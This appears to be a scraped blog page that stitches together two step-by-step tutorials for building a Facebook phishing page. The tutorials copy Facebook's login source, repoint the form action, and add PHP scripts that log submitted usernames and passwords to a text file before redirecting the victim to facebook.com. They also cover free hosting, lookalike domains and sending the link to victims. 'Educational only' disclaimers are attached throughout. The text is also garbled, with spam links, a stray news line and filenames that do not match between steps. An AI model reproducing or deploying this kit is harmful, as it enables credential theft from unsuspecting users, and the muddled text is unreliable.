1. Facebook Phishing Code
  2. Facebook Phishing Page Download
  3. Facebook Phishing Site Link Extension
  4. Phishing Page For Facebook

Phishing is a criminal activity that uses social engineering techniques. Hackers attempt to fraudulently acquire information such as username, passwords, and credit card details, by masquerading as a trustworthy entity in an electronic communication.

The most widely used technique in phishing is the use of Fake Log in Pages (phishing page), also known as spoofed pages. These fake login pages resemble the original login pages and look like the real website. But they are fake whose target is to get users password. Mostly phishing pages of sites like Facebook, Instagram, Yahoo, Gmail, MySpace, etc. are created by hackers. They mostly use these websites for an obvious reason, due to large users base.

Phishing the Famous. A Georgia man who used phishing techniques to steal celebrities' credit card numbers and use them fraudulently has been sentenced to prison for his crimes. Now your phishing page is ready. Send your site link to your victim and get their passwords. Passwords will come into your mail account. This tool does not work properly now as it is outdated but let me share with you another tool using which you can create fake login page of popular websites like facebook, Instagram, Google etc. Creating fake login page is called as phishing. What is Phishing? Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows: A user clicks on a bad link to a phishing site.

Read More:

The victim is fooled to believe the fake Facebook page to be the real one and enter his/her password. To protect yourself from phishing do not open fake or unknown links. Check the URL (website domain address) of the website before giving any information. Because a fake page has a different URL. Phishing FB is the common trick for so long time. So, most people know it. You can find some tips to prevent yourself from this type of hacking.

Create a Phishing Page (Step By Step Guide)

How to create this phishing page? Is it difficult to do that or there is any technical skill required for this like programming, networking, etc? Creating a phishing page is easy. You only need to learn some basic knowledge about how it works and the procedure on which it is working. You can learn everything in this article. Everything is explained in steps for educational purposes only.

Suggested: How to see anyone password – Show Hidden Password

Step 1

In this article, I will show to create a facebook phishing page. To create phishing page, go to the Facebook.com and then right-click on the blank area, you will see the option view source page. Click on that.

Suggested: How To Become a Hacker

Step 2

Now a tab will open which will contain the source code of Facebook login page. Select all code and copy all code and paste it into notepad.

Suggested: Hacking Tricks and Prevention

Step 3

Now open notepad in which you have pasted this code and press CTRL+F and type ACTION.

Suggested: Instahax0r – Hack secretly Anyone Instagram ID and Password

Step 4

You will have to search again and again till you have found the text which looks like

Facebook Phishing Code

Suggested: Reddit NHL streams – Watch Hockey Live Streaming For Free 2019

Step 5

When you find something similar to this code (which is written above). Delete all the text code which is similar to the above code (written in grey colour box) and replace it with Post.php. Then it will look like action=”post.php.

Suggested: FirstOneTv Is No More – 5 Excellent Replacement for FirstOneTv

Step 6

Now save it to your desktop with the name index.htm and yes remember not to save it as index.html. As many individuals do this mistakes. Now you have completely made your phishing page.

Step 7

Now you need to create a PHP file for this. Open a new notepad and copy the code given below and save it with the name post.php.

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Now, You have successfully created two files

  • index.htm
  • post.php

Step 8

Now you need to upload these two files in a free web hosting site. Some best Web hosting site which is useful for you. you need to make an account on any of one below web hosting site.

  1. www.my3gb.com
  2. www.000webhost.com
  3. Freehosting

I prefer www.000webhost.com. Many times, users facing a problem using the 000webhost website. So, in case if it not working or you are unable to upload the file. You may use other alternatives that I have given.

Step 9

Now, you have to sign up for an account. Click on free sign up and fill all required information in the registration form. When your account completely set up simply log in with your username and password.

Suggested: Soccer Streams Reddit is Dead – 5 Amazing Alternatives For /r/soccerstreams

Step 10

Now open Cpanel (control panel) then click on file manager. After that, a new window will pop up. now go to public_html.

Facebook Phishing Page Download

Step 11

Delete the file named default.php after that you need to upload index.htm and post.phpfile. Click on upload files button and upload both files one by one. Now click on index.htm which will look like same as that of the original Facebook page. This is your phishing page of Facebook.

Note: phishing is a criminal offense and illegal activity so don’t try to anyone. This tutorial is for educational purpose. You can learn these things to boost your knowledge and you can try it on your own system to learn it. Don’t try this on anyone else.

See Also:

Phishing

For any help, you can leave a message on the Facebook page.

Ever heard about Phishing page and Phishing Attack? Today I’m going to show you how to create a Phishing page & How to do Phishing Attack step by step full tutorial. So, do you know

Table Of Content

  • 1 What is Phishing Page?
    • 1.3 How to make a php script?

This Tutorial is for Education Purpose only!!!

Phishing is a technique by which we create a similar web page(Phishing Page) to the original one. In this technique, we copy original website page code and do some changes to it. Then upload it to the hosting and access it from anywhere.

Here is the list of things that you will learn from this post

  • How to copy the code from the original website
  • How to do some changes in this code
  • How to make a php script
  • How to upload it to the Hosting
  • and a lot more !!!

Umm!!! Interested to read further ?? I’m sure you will like this tutorial and you want this tutorial. 😛

DON’T MISS:- web.whatsapp.com Hack Tutorial Step by Step Explanation

How to copy the code from the original website

Open a website of which Phishing page do you want then press ctrl+U to open its source code file. For ex:- I’m copying the code of Facebook.com and then I will make a facebook phishing page. Well, this is what which you want …Right!! 😛

Facebook

So I’m copying the source code from Fcaebook.com by pressing ctrl+U. You can see here the source code from Facebook.com is shown here.

The only thing you have to do is to select all code and then copy this code by pressing ctrl+A and then ctrl+C and then open a notepad file and paste it there by pressing ctrl+V.

You can see here I pasted down the whole code from website to my notepad file.

How to do some changes in this code?

Phishing

Now, you have to find this line by pressing ctrl+F and type this whole line there and press Enter.

action=”https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110″ method=”post”


Let’s do some changes, You can see the path of Facebook is shown here. Copy this whole path and replace it with login.php and also change the method from post to get. and save this notepad file with the name fb.html.


How to make a php script?

Do you know Php Language? Well, If you don’t know anything about Php Language then no problem but in the future, I recommend you to learn this language. So, I’m giving you a PHP code which will save the username password which is entered on our fb.html page. and it also saves different username and password to a new line. When the victim enters his username and password to it then this PHP script will redirect that user to the original Facebook page.

So, here’s the Php script

<?php
header(“Location: https://www.facebook.com”);
$handle = fopen(“logs.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);


fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Phishing Page For Facebook

Just copy this script and paste it down to your notepad file and then save this file with a name hack.php

One more thing creates a blank notepad file with a logs.txt name on which victim’s usernames and password will save.

Now, you have three notepad files one is none.html and second is login.php and third is logs.txt. Just copy all files and save it to a new folder.

How to upload Facebook Phishing Page to the Hosting?

Let Understand what is Hosting and Domain. To open a website we must have a domain, hosting. So, Domain is the name of our website. For ex :- I have Hackingblogs.com This is my domain. and the location where this domain has parked this location is known as hosting.

Still Confused!! Let’s Understand with an Example, Whenever we open a new store then we have to decide two things

  • Store’s Name
  • Land/room

Similarly, For opening a website we need Domain for a website which is unique. and the second one is the land which is hosting on the Internet. Hosting and Domain are paid and some websites also provide this hosting and domain at free of cost.

Here’s the list of Free hosting providers website.


  • and many more…

I’m using 000webhost here. So, open this website and do sign up there. In the field of a website, name leaves it blank.

and now you have to take a domain which looks similar to Facebook. If you don’t know about creating a similar word the same as the original one. Check my earlier post.

I’m sharing some website link which provides free domains.

You can use any of them to register a domain for free. Now, come to the hosting. You can use any of the websites. Now, the post is becoming so long so, at 29 April I will upload Its second part in which I will show you how to attach domain and hosting and also tell some tricks which nobody tells you. 🙂 So, do subscribe to the new post. Good Bye 🙂

This is the Second Part:- How to Upload a Phishing page on Hosting | Phishing Page Part 2